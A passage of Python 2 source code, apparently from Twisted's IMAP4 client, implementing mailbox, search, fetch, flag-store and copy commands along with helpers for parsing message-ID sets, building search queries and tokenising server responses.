This command is allowed in the Authenticated and Selected states.
@type name: C{str}
@param name: The name of the mailbox to delete.
@rtype: C{Deferred}
@return: A deferred whose calblack is invoked if the mailbox is
deleted successfully and whose errback is invoked otherwise.
"""
return self.sendCommand(Command('DELETE', _prepareMailboxName(name)))
def rename(self, oldname, newname):
"""Rename a mailbox
This command is allowed in the Authenticated and Selected states.
@type oldname: C{str}
@param oldname: The current name of the mailbox to rename.
@type newname: C{str}
@param newname: The new name to give the mailbox.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked if the rename is
successful and whose errback is invoked otherwise.
"""
oldname = _prepareMailboxName(oldname)
newname = _prepareMailboxName(newname)
return self.sendCommand(Command('RENAME', ' '.join((oldname, newname))))
def subscribe(self, name):
"""Add a mailbox to the subscription list
This command is allowed in the Authenticated and Selected states.
@type name: C{str}
@param name: The mailbox to mark as 'active' or 'subscribed'
@rtype: C{Deferred}
@return: A deferred whose callback is invoked if the subscription
is successful and whose errback is invoked otherwise.
"""
return self.sendCommand(Command('SUBSCRIBE', _prepareMailboxName(name)))
def unsubscribe(self, name):
"""Remove a mailbox from the subscription list
This command is allowed in the Authenticated and Selected states.
@type name: C{str}
@param name: The mailbox to unsubscribe
@rtype: C{Deferred}
@return: A deferred whose callback is invoked if the unsubscription
is successful and whose errback is invoked otherwise.
"""
return self.sendCommand(Command('UNSUBSCRIBE', _prepareMailboxName(name)))
def list(self, reference, wildcard):
"""List a subset of the available mailboxes
This command is allowed in the Authenticated and Selected states.
@type reference: C{str}
@param reference: The context in which to interpret C{wildcard}
@type wildcard: C{str}
@param wildcard: The pattern of mailbox names to match, optionally
including either or both of the '*' and '%' wildcards. '*' will
match zero or more characters and cross hierarchical boundaries.
'%' will also match zero or more characters, but is limited to a
single hierarchical level.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a list of C{tuple}s,
the first element of which is a C{tuple} of mailbox flags, the second
element of which is the hierarchy delimiter for this mailbox, and the
third of which is the mailbox name; if the command is unsuccessful,
the deferred's errback is invoked instead.
"""
cmd = 'LIST'
args = '"%s" "%s"' % (reference, wildcard.encode('imap4-utf-7'))
resp = ('LIST',)
d = self.sendCommand(Command(cmd, args, wantResponse=resp))
d.addCallback(self.__cbList, 'LIST')
return d
def lsub(self, reference, wildcard):
"""List a subset of the subscribed available mailboxes
This command is allowed in the Authenticated and Selected states.
The parameters and returned object are the same as for the C{list}
method, with one slight difference: Only mailboxes which have been
subscribed can be included in the resulting list.
"""
cmd = 'LSUB'
args = '"%s" "%s"' % (reference, wildcard.encode('imap4-utf-7'))
resp = ('LSUB',)
d = self.sendCommand(Command(cmd, args, wantResponse=resp))
d.addCallback(self.__cbList, 'LSUB')
return d
def __cbList(self, (lines, last), command):
results = []
for parts in lines:
if len(parts) == 4 and parts[0] == command:
parts[1] = tuple(parts[1])
results.append(tuple(parts[1:]))
return results
def status(self, mailbox, *names):
"""
Retrieve the status of the given mailbox
This command is allowed in the Authenticated and Selected states.
@type mailbox: C{str}
@param mailbox: The name of the mailbox to query
@type *names: C{str}
@param *names: The status names to query. These may be any number of:
C{'MESSAGES'}, C{'RECENT'}, C{'UIDNEXT'}, C{'UIDVALIDITY'}, and
C{'UNSEEN'}.
@rtype: C{Deferred}
@return: A deferred which fires with with the status information if the
command is successful and whose errback is invoked otherwise. The
status information is in the form of a C{dict}. Each element of
C{names} is a key in the dictionary. The value for each key is the
corresponding response from the server.
"""
cmd = 'STATUS'
args = "%s (%s)" % (_prepareMailboxName(mailbox), ' '.join(names))
resp = ('STATUS',)
d = self.sendCommand(Command(cmd, args, wantResponse=resp))
d.addCallback(self.__cbStatus)
return d
def __cbStatus(self, (lines, last)):
status = {}
for parts in lines:
if parts[0] == 'STATUS':
items = parts[2]
items = [items[i:i+2] for i in range(0, len(items), 2)]
status.update(dict(items))
for k in status.keys():
t = self.STATUS_TRANSFORMATIONS.get(k)
if t:
try:
status[k] = t(status[k])
except Exception, e:
raise IllegalServerResponse('(%s %s): %s' % (k, status[k], str(e)))
return status
def append(self, mailbox, message, flags = (), date = None):
"""Add the given message to the given mailbox.
This command is allowed in the Authenticated and Selected states.
@type mailbox: C{str}
@param mailbox: The mailbox to which to add this message.
@type message: Any file-like object
@param message: The message to add, in RFC822 format. Newlines
in this file should be \\r\\n-style.
@type flags: Any iterable of C{str}
@param flags: The flags to associated with this message.
@type date: C{str}
@param date: The date to associate with this message. This should
be of the format DD-MM-YYYY HH:MM:SS +/-HHMM. For example, in
Eastern Standard Time, on July 1st 2004 at half past 1 PM,
\"01-07-2004 13:30:00 -0500\".
@rtype: C{Deferred}
@return: A deferred whose callback is invoked when this command
succeeds or whose errback is invoked if it fails.
"""
message.seek(0, 2)
L = message.tell()
message.seek(0, 0)
fmt = '%s (%s)%s {%d}'
if date:
date = ' "%s"' % date
else:
date = ''
cmd = fmt % (
_prepareMailboxName(mailbox), ' '.join(flags),
date, L
)
d = self.sendCommand(Command('APPEND', cmd, (), self.__cbContinueAppend, message))
return d
def __cbContinueAppend(self, lines, message):
s = basic.FileSender()
return s.beginFileTransfer(message, self.transport, None
).addCallback(self.__cbFinishAppend)
def __cbFinishAppend(self, foo):
self.sendLine('')
def check(self):
"""Tell the server to perform a checkpoint
This command is allowed in the Selected state.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked when this command
succeeds or whose errback is invoked if it fails.
"""
return self.sendCommand(Command('CHECK'))
def close(self):
"""Return the connection to the Authenticated state.
This command is allowed in the Selected state.
Issuing this command will also remove all messages flagged \\Deleted
from the selected mailbox if it is opened in read-write mode,
otherwise it indicates success by no messages are removed.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked when the command
completes successfully or whose errback is invoked if it fails.
"""
return self.sendCommand(Command('CLOSE'))
def expunge(self):
"""Return the connection to the Authenticate state.
This command is allowed in the Selected state.
Issuing this command will perform the same actions as issuing the
close command, but will also generate an 'expunge' response for
every message deleted.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a list of the
'expunge' responses when this command is successful or whose errback
is invoked otherwise.
"""
cmd = 'EXPUNGE'
resp = ('EXPUNGE',)
d = self.sendCommand(Command(cmd, wantResponse=resp))
d.addCallback(self.__cbExpunge)
return d
def __cbExpunge(self, (lines, last)):
ids = []
for parts in lines:
if len(parts) == 2 and parts[1] == 'EXPUNGE':
ids.append(self._intOrRaise(parts[0], parts))
return ids
def search(self, *queries, **kwarg):
"""Search messages in the currently selected mailbox
This command is allowed in the Selected state.
Any non-zero number of queries are accepted by this method, as
returned by the C{Query}, C{Or}, and C{Not} functions.
One keyword argument is accepted: if uid is passed in with a non-zero
value, the server is asked to return message UIDs instead of message
sequence numbers.
@rtype: C{Deferred}
@return: A deferred whose callback will be invoked with a list of all
the message sequence numbers return by the search, or whose errback
will be invoked if there is an error.
"""
if kwarg.get('uid'):
cmd = 'UID SEARCH'
else:
cmd = 'SEARCH'
args = ' '.join(queries)
d = self.sendCommand(Command(cmd, args, wantResponse=(cmd,)))
d.addCallback(self.__cbSearch)
return d
def __cbSearch(self, (lines, end)):
ids = []
for parts in lines:
if len(parts) > 0 and parts[0] == 'SEARCH':
ids.extend([self._intOrRaise(p, parts) for p in parts[1:]])
return ids
def fetchUID(self, messages, uid=0):
"""Retrieve the unique identifier for one or more messages
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
message sequence numbers to unique message identifiers, or whose
errback is invoked if there is an error.
"""
return self._fetch(messages, useUID=uid, uid=1)
def fetchFlags(self, messages, uid=0):
"""Retrieve the flags for one or more messages
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: The messages for which to retrieve flags.
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
message numbers to lists of flags, or whose errback is invoked if
there is an error.
"""
return self._fetch(str(messages), useUID=uid, flags=1)
def fetchInternalDate(self, messages, uid=0):
"""Retrieve the internal date associated with one or more messages
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: The messages for which to retrieve the internal date.
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
message numbers to date strings, or whose errback is invoked
if there is an error. Date strings take the format of
\"day-month-year time timezone\".
"""
return self._fetch(str(messages), useUID=uid, internaldate=1)
def fetchEnvelope(self, messages, uid=0):
"""Retrieve the envelope data for one or more messages
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: The messages for which to retrieve envelope data.
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
message numbers to envelope data, or whose errback is invoked
if there is an error. Envelope data consists of a sequence of the
date, subject, from, sender, reply-to, to, cc, bcc, in-reply-to,
and message-id header fields. The date, subject, in-reply-to, and
message-id fields are strings, while the from, sender, reply-to,
to, cc, and bcc fields contain address data. Address data consists
of a sequence of name, source route, mailbox name, and hostname.
Fields which are not present for a particular address may be C{None}.
"""
return self._fetch(str(messages), useUID=uid, envelope=1)
def fetchBodyStructure(self, messages, uid=0):
"""Retrieve the structure of the body of one or more messages
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: The messages for which to retrieve body structure
data.
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
message numbers to body structure data, or whose errback is invoked
if there is an error. Body structure data describes the MIME-IMB
format of a message and consists of a sequence of mime type, mime
subtype, parameters, content id, description, encoding, and size.
The fields following the size field are variable: if the mime
type/subtype is message/rfc822, the contained message's envelope
information, body structure data, and number of lines of text; if
the mime type is text, the number of lines of text. Extension fields
may also be included; if present, they are: the MD5 hash of the body,
body disposition, body language.
"""
return self._fetch(messages, useUID=uid, bodystructure=1)
def fetchSimplifiedBody(self, messages, uid=0):
"""Retrieve the simplified body structure of one or more messages
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
message numbers to body data, or whose errback is invoked
if there is an error. The simplified body structure is the same
as the body structure, except that extension fields will never be
present.
"""
return self._fetch(messages, useUID=uid, body=1)
def fetchMessage(self, messages, uid=0):
"""Retrieve one or more entire messages
This command is allowed in the Selected state.
@type messages: L{MessageSet} or C{str}
@param messages: A message sequence set
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: L{Deferred}
@return: A L{Deferred} which will fire with a C{dict} mapping message
sequence numbers to C{dict}s giving message data for the
corresponding message. If C{uid} is true, the inner dictionaries
have a C{'UID'} key mapped to a C{str} giving the UID for the
message. The text of the message is a C{str} associated with the
C{'RFC822'} key in each dictionary.
"""
return self._fetch(messages, useUID=uid, rfc822=1)
def fetchHeaders(self, messages, uid=0):
"""Retrieve headers of one or more messages
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
message numbers to dicts of message headers, or whose errback is
invoked if there is an error.
"""
return self._fetch(messages, useUID=uid, rfc822header=1)
def fetchBody(self, messages, uid=0):
"""Retrieve body text of one or more messages
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
message numbers to file-like objects containing body text, or whose
errback is invoked if there is an error.
"""
return self._fetch(messages, useUID=uid, rfc822text=1)
def fetchSize(self, messages, uid=0):
"""Retrieve the size, in octets, of one or more messages
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
message numbers to sizes, or whose errback is invoked if there is
an error.
"""
return self._fetch(messages, useUID=uid, rfc822size=1)
def fetchFull(self, messages, uid=0):
"""Retrieve several different fields of one or more messages
This command is allowed in the Selected state. This is equivalent
to issuing all of the C{fetchFlags}, C{fetchInternalDate},
C{fetchSize}, C{fetchEnvelope}, and C{fetchSimplifiedBody}
functions.
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
message numbers to dict of the retrieved data values, or whose
errback is invoked if there is an error. They dictionary keys
are "flags", "date", "size", "envelope", and "body".
"""
return self._fetch(
messages, useUID=uid, flags=1, internaldate=1,
rfc822size=1, envelope=1, body=1)
def fetchAll(self, messages, uid=0):
"""Retrieve several different fields of one or more messages
This command is allowed in the Selected state. This is equivalent
to issuing all of the C{fetchFlags}, C{fetchInternalDate},
C{fetchSize}, and C{fetchEnvelope} functions.
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
message numbers to dict of the retrieved data values, or whose
errback is invoked if there is an error. They dictionary keys
are "flags", "date", "size", and "envelope".
"""
return self._fetch(
messages, useUID=uid, flags=1, internaldate=1,
rfc822size=1, envelope=1)
def fetchFast(self, messages, uid=0):
"""Retrieve several different fields of one or more messages
This command is allowed in the Selected state. This is equivalent
to issuing all of the C{fetchFlags}, C{fetchInternalDate}, and
C{fetchSize} functions.
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
message numbers to dict of the retrieved data values, or whose
errback is invoked if there is an error. They dictionary keys are
"flags", "date", and "size".
"""
return self._fetch(
messages, useUID=uid, flags=1, internaldate=1, rfc822size=1)
def _parseFetchPairs(self, fetchResponseList):
"""
Given the result of parsing a single I{FETCH} response, construct a
C{dict} mapping response keys to response values.
@param fetchResponseList: The result of parsing a I{FETCH} response
with L{parseNestedParens} and extracting just the response data
(that is, just the part that comes after C{"FETCH"}). The form
of this input (and therefore the output of this method) is very
disagreable. A valuable improvement would be to enumerate the
possible keys (representing them as structured objects of some
sort) rather than using strings and tuples of tuples of strings
and so forth. This would allow the keys to be documented more
easily and would allow for a much simpler application-facing API
(one not based on looking up somewhat hard to predict keys in a
dict). Since C{fetchResponseList} notionally represents a
flattened sequence of pairs (identifying keys followed by their
associated values), collapsing such complex elements of this
list as C{["BODY", ["HEADER.FIELDS", ["SUBJECT"]]]} into a
single object would also greatly simplify the implementation of
this method.
@return: A C{dict} of the response data represented by C{pairs}. Keys
in this dictionary are things like C{"RFC822.TEXT"}, C{"FLAGS"}, or
C{("BODY", ("HEADER.FIELDS", ("SUBJECT",)))}. Values are entirely
dependent on the key with which they are associated, but retain the
same structured as produced by L{parseNestedParens}.
"""
values = {}
responseParts = iter(fetchResponseList)
while True:
try:
key = responseParts.next()
except StopIteration:
break
try:
value = responseParts.next()
except StopIteration:
raise IllegalServerResponse(
"Not enough arguments", fetchResponseList)
# The parsed forms of responses like:
#
# BODY[] VALUE
# BODY[TEXT] VALUE
# BODY[HEADER.FIELDS (SUBJECT)] VALUE
# BODY[HEADER.FIELDS (SUBJECT)]<N.M> VALUE
#
# are:
#
# ["BODY", [], VALUE]
# ["BODY", ["TEXT"], VALUE]
# ["BODY", ["HEADER.FIELDS", ["SUBJECT"]], VALUE]
# ["BODY", ["HEADER.FIELDS", ["SUBJECT"]], "<N.M>", VALUE]
#
# Here, check for these cases and grab as many extra elements as
# necessary to retrieve the body information.
if key in ("BODY", "BODY.PEEK") and isinstance(value, list) and len(value) < 3:
if len(value) < 2:
key = (key, tuple(value))
else:
key = (key, (value[0], tuple(value[1])))
try:
value = responseParts.next()
except StopIteration:
raise IllegalServerResponse(
"Not enough arguments", fetchResponseList)
# Handle partial ranges
if value.startswith('<') and value.endswith('>'):
try:
int(value[1:-1])
except ValueError:
# This isn't really a range, it's some content.
pass
else:
key = key + (value,)
try:
value = responseParts.next()
except StopIteration:
raise IllegalServerResponse(
"Not enough arguments", fetchResponseList)
values[key] = value
return values
def _cbFetch(self, (lines, last), requestedParts, structured):
info = {}
for parts in lines:
if len(parts) == 3 and parts[1] == 'FETCH':
id = self._intOrRaise(parts[0], parts)
if id not in info:
info[id] = [parts[2]]
else:
info[id][0].extend(parts[2])
results = {}
for (messageId, values) in info.iteritems():
mapping = self._parseFetchPairs(values[0])
results.setdefault(messageId, {}).update(mapping)
flagChanges = {}
for messageId in results.keys():
values = results[messageId]
for part in values.keys():
if part not in requestedParts and part == 'FLAGS':
flagChanges[messageId] = values['FLAGS']
# Find flags in the result and get rid of them.
for i in range(len(info[messageId][0])):
if info[messageId][0][i] == 'FLAGS':
del info[messageId][0][i:i+2]
break
del values['FLAGS']
if not values:
del results[messageId]
if flagChanges:
self.flagsChanged(flagChanges)
if structured:
return results
else:
return info
def fetchSpecific(self, messages, uid=0, headerType=None,
headerNumber=None, headerArgs=None, peek=None,
offset=None, length=None):
"""Retrieve a specific section of one or more messages
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@type headerType: C{str}
@param headerType: If specified, must be one of HEADER,
HEADER.FIELDS, HEADER.FIELDS.NOT, MIME, or TEXT, and will determine
which part of the message is retrieved. For HEADER.FIELDS and
HEADER.FIELDS.NOT, C{headerArgs} must be a sequence of header names.
For MIME, C{headerNumber} must be specified.
@type headerNumber: C{int} or C{int} sequence
@param headerNumber: The nested rfc822 index specifying the
entity to retrieve. For example, C{1} retrieves the first
entity of the message, and C{(2, 1, 3}) retrieves the 3rd
entity inside the first entity inside the second entity of
the message.
@type headerArgs: A sequence of C{str}
@param headerArgs: If C{headerType} is HEADER.FIELDS, these are the
headers to retrieve. If it is HEADER.FIELDS.NOT, these are the
headers to exclude from retrieval.
@type peek: C{bool}
@param peek: If true, cause the server to not set the \\Seen
flag on this message as a result of this command.
@type offset: C{int}
@param offset: The number of octets at the beginning of the result
to skip.
@type length: C{int}
@param length: The number of octets to retrieve.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a mapping of
message numbers to retrieved data, or whose errback is invoked
if there is an error.
"""
fmt = '%s BODY%s[%s%s%s]%s'
if headerNumber is None:
number = ''
elif isinstance(headerNumber, int):
number = str(headerNumber)
else:
number = '.'.join(map(str, headerNumber))
if headerType is None:
header = ''
elif number:
header = '.' + headerType
else:
header = headerType
if header and headerType not in ('TEXT', 'MIME'):
if headerArgs is not None:
payload = ' (%s)' % ' '.join(headerArgs)
else:
payload = ' ()'
else:
payload = ''
if offset is None:
extra = ''
else:
extra = '<%d.%d>' % (offset, length)
fetch = uid and 'UID FETCH' or 'FETCH'
cmd = fmt % (messages, peek and '.PEEK' or '', number, header, payload, extra)
d = self.sendCommand(Command(fetch, cmd, wantResponse=('FETCH',)))
d.addCallback(self._cbFetch, (), False)
return d
def _fetch(self, messages, useUID=0, **terms):
fetch = useUID and 'UID FETCH' or 'FETCH'
if 'rfc822text' in terms:
del terms['rfc822text']
terms['rfc822.text'] = True
if 'rfc822size' in terms:
del terms['rfc822size']
terms['rfc822.size'] = True
if 'rfc822header' in terms:
del terms['rfc822header']
terms['rfc822.header'] = True
cmd = '%s (%s)' % (messages, ' '.join([s.upper() for s in terms.keys()]))
d = self.sendCommand(Command(fetch, cmd, wantResponse=('FETCH',)))
d.addCallback(self._cbFetch, map(str.upper, terms.keys()), True)
return d
def setFlags(self, messages, flags, silent=1, uid=0):
"""Set the flags for one or more messages.
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type flags: Any iterable of C{str}
@param flags: The flags to set
@type silent: C{bool}
@param silent: If true, cause the server to supress its verbose
response.
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a list of the
the server's responses (C{[]} if C{silent} is true) or whose
errback is invoked if there is an error.
"""
return self._store(str(messages), 'FLAGS', silent, flags, uid)
def addFlags(self, messages, flags, silent=1, uid=0):
"""Add to the set flags for one or more messages.
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type flags: Any iterable of C{str}
@param flags: The flags to set
@type silent: C{bool}
@param silent: If true, cause the server to supress its verbose
response.
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a list of the
the server's responses (C{[]} if C{silent} is true) or whose
errback is invoked if there is an error.
"""
return self._store(str(messages),'+FLAGS', silent, flags, uid)
def removeFlags(self, messages, flags, silent=1, uid=0):
"""Remove from the set flags for one or more messages.
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type flags: Any iterable of C{str}
@param flags: The flags to set
@type silent: C{bool}
@param silent: If true, cause the server to supress its verbose
response.
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a list of the
the server's responses (C{[]} if C{silent} is true) or whose
errback is invoked if there is an error.
"""
return self._store(str(messages), '-FLAGS', silent, flags, uid)
def _store(self, messages, cmd, silent, flags, uid):
if silent:
cmd = cmd + '.SILENT'
store = uid and 'UID STORE' or 'STORE'
args = ' '.join((messages, cmd, '(%s)' % ' '.join(flags)))
d = self.sendCommand(Command(store, args, wantResponse=('FETCH',)))
expected = ()
if not silent:
expected = ('FLAGS',)
d.addCallback(self._cbFetch, expected, True)
return d
def copy(self, messages, mailbox, uid):
"""Copy the specified messages to the specified mailbox.
This command is allowed in the Selected state.
@type messages: C{str}
@param messages: A message sequence set
@type mailbox: C{str}
@param mailbox: The mailbox to which to copy the messages
@type uid: C{bool}
@param uid: If true, the C{messages} refers to message UIDs, rather
than message sequence numbers.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a true value
when the copy is successful, or whose errback is invoked if there
is an error.
"""
if uid:
cmd = 'UID COPY'
else:
cmd = 'COPY'
args = '%s %s' % (messages, _prepareMailboxName(mailbox))
return self.sendCommand(Command(cmd, args))
#
# IMailboxListener methods
#
def modeChanged(self, writeable):
"""Override me"""
def flagsChanged(self, newFlags):
"""Override me"""
def newMessages(self, exists, recent):
"""Override me"""
class IllegalIdentifierError(IMAP4Exception): pass
def parseIdList(s, lastMessageId=None):
"""
Parse a message set search key into a C{MessageSet}.
@type s: C{str}
@param s: A string description of a id list, for example "1:3, 4:*"
@type lastMessageId: C{int}
@param lastMessageId: The last message sequence id or UID, depending on
whether we are parsing the list in UID or sequence id context. The
caller should pass in the correct value.
@rtype: C{MessageSet}
@return: A C{MessageSet} that contains the ids defined in the list
"""
res = MessageSet()
parts = s.split(',')
for p in parts:
if ':' in p:
low, high = p.split(':', 1)
try:
if low == '*':
low = None
else:
low = long(low)
if high == '*':
high = None
else:
high = long(high)
if low is high is None:
# *:* does not make sense
raise IllegalIdentifierError(p)
# non-positive values are illegal according to RFC 3501
if ((low is not None and low <= 0) or
(high is not None and high <= 0)):
raise IllegalIdentifierError(p)
# star means "highest value of an id in the mailbox"
high = high or lastMessageId
low = low or lastMessageId
# RFC says that 2:4 and 4:2 are equivalent
if low > high:
low, high = high, low
res.extend((low, high))
except ValueError:
raise IllegalIdentifierError(p)
else:
try:
if p == '*':
p = None
else:
p = long(p)
if p is not None and p <= 0:
raise IllegalIdentifierError(p)
except ValueError:
raise IllegalIdentifierError(p)
else:
res.extend(p or lastMessageId)
return res
class IllegalQueryError(IMAP4Exception): pass
_SIMPLE_BOOL = (
'ALL', 'ANSWERED', 'DELETED', 'DRAFT', 'FLAGGED', 'NEW', 'OLD', 'RECENT',
'SEEN', 'UNANSWERED', 'UNDELETED', 'UNDRAFT', 'UNFLAGGED', 'UNSEEN'
)
_NO_QUOTES = (
'LARGER', 'SMALLER', 'UID'
)
def Query(sorted=0, **kwarg):
"""Create a query string
Among the accepted keywords are::
all : If set to a true value, search all messages in the
current mailbox
answered : If set to a true value, search messages flagged with
\\Answered
bcc : A substring to search the BCC header field for
before : Search messages with an internal date before this
value. The given date should be a string in the format
of 'DD-Mon-YYYY'. For example, '03-Mar-2003'.
body : A substring to search the body of the messages for
cc : A substring to search the CC header field for
deleted : If set to a true value, search messages flagged with
\\Deleted
draft : If set to a true value, search messages flagged with
\\Draft
flagged : If set to a true value, search messages flagged with
\\Flagged
from : A substring to search the From header field for
header : A two-tuple of a header name and substring to search
for in that header
keyword : Search for messages with the given keyword set
larger : Search for messages larger than this number of octets
messages : Search only the given message sequence set.
new : If set to a true value, search messages flagged with
\\Recent but not \\Seen
old : If set to a true value, search messages not flagged with
\\Recent
on : Search messages with an internal date which is on this
date. The given date should be a string in the format
of 'DD-Mon-YYYY'. For example, '03-Mar-2003'.
recent : If set to a true value, search for messages flagged with
\\Recent
seen : If set to a true value, search for messages flagged with
\\Seen
sentbefore : Search for messages with an RFC822 'Date' header before
this date. The given date should be a string in the format
of 'DD-Mon-YYYY'. For example, '03-Mar-2003'.
senton : Search for messages with an RFC822 'Date' header which is
on this date The given date should be a string in the format
of 'DD-Mon-YYYY'. For example, '03-Mar-2003'.
sentsince : Search for messages with an RFC822 'Date' header which is
after this date. The given date should be a string in the format
of 'DD-Mon-YYYY'. For example, '03-Mar-2003'.
since : Search for messages with an internal date that is after
this date.. The given date should be a string in the format
of 'DD-Mon-YYYY'. For example, '03-Mar-2003'.
smaller : Search for messages smaller than this number of octets
subject : A substring to search the 'subject' header for
text : A substring to search the entire message for
to : A substring to search the 'to' header for
uid : Search only the messages in the given message set
unanswered : If set to a true value, search for messages not
flagged with \\Answered
undeleted : If set to a true value, search for messages not
flagged with \\Deleted
undraft : If set to a true value, search for messages not
flagged with \\Draft
unflagged : If set to a true value, search for messages not
flagged with \\Flagged
unkeyword : Search for messages without the given keyword set
unseen : If set to a true value, search for messages not
flagged with \\Seen
@type sorted: C{bool}
@param sorted: If true, the output will be sorted, alphabetically.
The standard does not require it, but it makes testing this function
easier. The default is zero, and this should be acceptable for any
application.
@rtype: C{str}
@return: The formatted query string
"""
cmd = []
keys = kwarg.keys()
if sorted:
keys.sort()
for k in keys:
v = kwarg[k]
k = k.upper()
if k in _SIMPLE_BOOL and v:
cmd.append(k)
elif k == 'HEADER':
cmd.extend([k, v[0], '"%s"' % (v[1],)])
elif k not in _NO_QUOTES:
cmd.extend([k, '"%s"' % (v,)])
else:
cmd.extend([k, '%s' % (v,)])
if len(cmd) > 1:
return '(%s)' % ' '.join(cmd)
else:
return ' '.join(cmd)
def Or(*args):
"""The disjunction of two or more queries"""
if len(args) < 2:
raise IllegalQueryError, args
elif len(args) == 2:
return '(OR %s %s)' % args
else:
return '(OR %s %s)' % (args[0], Or(*args[1:]))
def Not(query):
"""The negation of a query"""
return '(NOT %s)' % (query,)
class MismatchedNesting(IMAP4Exception):
pass
class MismatchedQuoting(IMAP4Exception):
pass
def wildcardToRegexp(wildcard, delim=None):
wildcard = wildcard.replace('*', '(?:.*?)')
if delim is None:
wildcard = wildcard.replace('%', '(?:.*?)')
else:
wildcard = wildcard.replace('%', '(?:(?:[^%s])*?)' % re.escape(delim))
return re.compile(wildcard, re.I)
def splitQuoted(s):
"""Split a string into whitespace delimited tokens
Tokens that would otherwise be separated but are surrounded by \"
remain as a single token. Any token that is not quoted and is
equal to \"NIL\" is tokenized as C{None}.
@type s: C{str}
@param s: The string to be split
@rtype: C{list} of C{str}
@return: A list of the resulting tokens
@raise MismatchedQuoting: Raised if an odd number of quotes are present
"""
s = s.strip()
result = []
word = []
inQuote = inWord = False
for i, c in enumerate(s):
if c == '"':
if i and s[i-1] == '\\':
word.pop()
word.append('"')
elif not inQuote:
inQuote = True
else:
inQuote = False
result.append(''.join(word))
word = []
elif not inWord and not inQuote and c not in ('"' + string.whitespace):
inWord = True
word.append(c)
elif inWord and not inQuote and c in string.whitespace:
w = ''.join(word)
if w == 'NIL':
result.append(None)
else:
result.append(w)
word = []
inWord = False
elif inWord or inQuote:
word.append(c)
if inQuote:
raise MismatchedQuoting(s)
if inWord:
w = ''.join(word)
if w == 'NIL':
result.append(None)
else:
result.append(w)
return result
def splitOn(sequence, predicate, transformers):
result = []
mode = predicate(sequence[0])
tmp = [sequence[0]]
for e in sequence[1:]:
p = predicate(e)
if p != mode:
result.extend(transformers[mode](tmp))
tmp = [e]
mode = p
else:
tmp.append(e)
result.extend(transformers[mode](tmp))
return result
def collapseStrings(results):
"""
Turns a list of length-one strings and lists into a list of longer
strings and lists. For example,
['a', 'b', ['c', 'd']] is returned as ['ab', ['cd']]
@type results: C{list} of C{str} and C{list}
@param results: The list to be collapsed
@rtype: C{list} of C{str} and C{list}
@return: A new list which is the collapsed form of C{results}
"""
copy = []
begun = None
listsList = [isinstance(s, types.ListType) for s in results]
pred = lambda e: isinstance(e, types.TupleType)
tran = {
0: lambda e: splitQuoted(''.join(e)),
1: lambda e: [''.join([i[0] for i in e])]
